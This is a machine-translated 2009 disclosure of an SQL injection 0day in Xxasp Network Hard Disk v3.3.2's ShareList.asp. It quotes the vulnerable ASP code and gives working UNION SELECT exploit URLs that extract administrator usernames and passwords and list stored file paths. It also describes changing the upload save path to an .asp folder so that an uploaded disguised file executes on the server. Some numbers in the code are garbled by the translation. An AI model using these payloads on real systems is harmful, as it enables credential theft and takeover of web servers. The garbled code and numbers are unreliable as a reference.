Xxasp Network Hard Disk v3. 3. 2 Sql injection 0day-vulnerability warning-the black bar safety net

2009-11-29T00:00:00
ID MYHACK58:62200925444
Type myhack58
Reporter 佚名
Modified 2009-11-29T00:00:00

Description

Xxasp Network Hard Disk v3. 3. 2 Sql injection 0day As for this system I do not introduced,the vulnerability relates to the file MyFiles. asp ShareList. asp, I to ShareList. asp is an example of a simple analysis the next,The code is as follows: Dim MyOrderBy,MyCondition,MyTopField,SearchType,SearchCondition SearchType=Trim(Request("SearchType")) SearchCondition=Trim(Request("SearchCondition")) //the injection point If SearchType="" Then SearchType="BaseSearch" If SearchCondition="" Then SearchCondition="1" MyTopField="" Select Case SearchType Case "BaseSearch" Select Case SearchCondition Case "2" MyOrderBy="A. F_AddTime Desc":MyCondition="Datediff('h',A. F_AddTime,"&amp; SqlNowString&")<2 5" Case "3" MyOrderBy="A. F_AddTime Desc":MyCondition="Datediff('d',F_AddTime,"&amp; SqlNowString&")<3" Case "4" MyOrderBy="A. F_AddTime Desc":MyCondition="Datediff('d',A. F_AddTime,"&amp; SqlNowString&")<7" Case "5" MyOrderBy="A. F_AddTime Desc":MyCondition="Datediff('d',A. F_AddTime,"&amp; SqlNowString&")<2 1" Case "6" MyOrderBy="A. F_AddTime Desc":MyCondition="Datediff('m',A. F_AddTime,"&amp; SqlNowString&")<1" Case "7" MyOrderBy="A. F_AddTime Desc":MyCondition="Datediff('m',A. F_AddTime,"&amp; SqlNowString&")<3" Case "8" MyTopField="Top 1 0 0 ":MyOrderBy="A. F_DownloadTimes Desc":MyCondition="" Case "9" If ClsPub. TW_Config(4 2)<=1 Then MyOrderBy="A. F_AddTime Desc":MyCondition="Datediff('h',A. F_AddTime,"&amp; SqlNowString&")<2 5" Else MyOrderBy="A. F_AddTime Desc":MyCondition="Datediff('d',A. F_AddTime,"&amp; SqlNowString&")<"&amp; ClsPub. TW_Config(4 2) End If Case "1 0" If ClsPub. TW_Config(4 2)<=1 Then MyOrderBy="A. F_AddTime Desc":MyCondition="Datediff('h',A. F_AddTime,"&amp; SqlNowString&")>2 5" Else MyOrderBy="A. F_AddTime Desc":MyCondition="Datediff('d',A. F_AddTime,"&amp; SqlNowString&")>"&amp; ClsPub. TW_Config(4 2) End If Case Else MyOrderBy="A. F_AddTime Desc":MyCondition="" End Select Case "SearchFileType" If SearchCondition<>"1" Then MyOrderBy="A. F_AddTime Desc":MyCondition="A. F_Ext='"&Lcase(SearchCondition)&"'" //if the SearchCondition is not 1,into the sql query Else MyOrderBy="A. F_AddTime Desc":MyCondition="" End If exp:registration after landing,<http://www.xxx.com/disk/ShareList.asp?Action=Main>&SearchType=SearchFileType&SearchCondition=rar' and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,AdminName,AdminPwd,1 4,1 5,1 6,1 7 from TW_Admin where '1'='1 ! Into the background,basic system settings=>File Save path modification is brought you. asp/ and then back to the front Desk to upload a modification of the suffix of the picture,then the term of the sentence lists the file address on the line <http://www.xxx.com/disk/ShareList.asp?Action=Main>&SearchType=SearchFileType&SearchCondition=rar' and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,F_Path,1 3,1 4,1 5,1 6,1 7 from TW_FilesList where '1'='1 As shown in Figure

!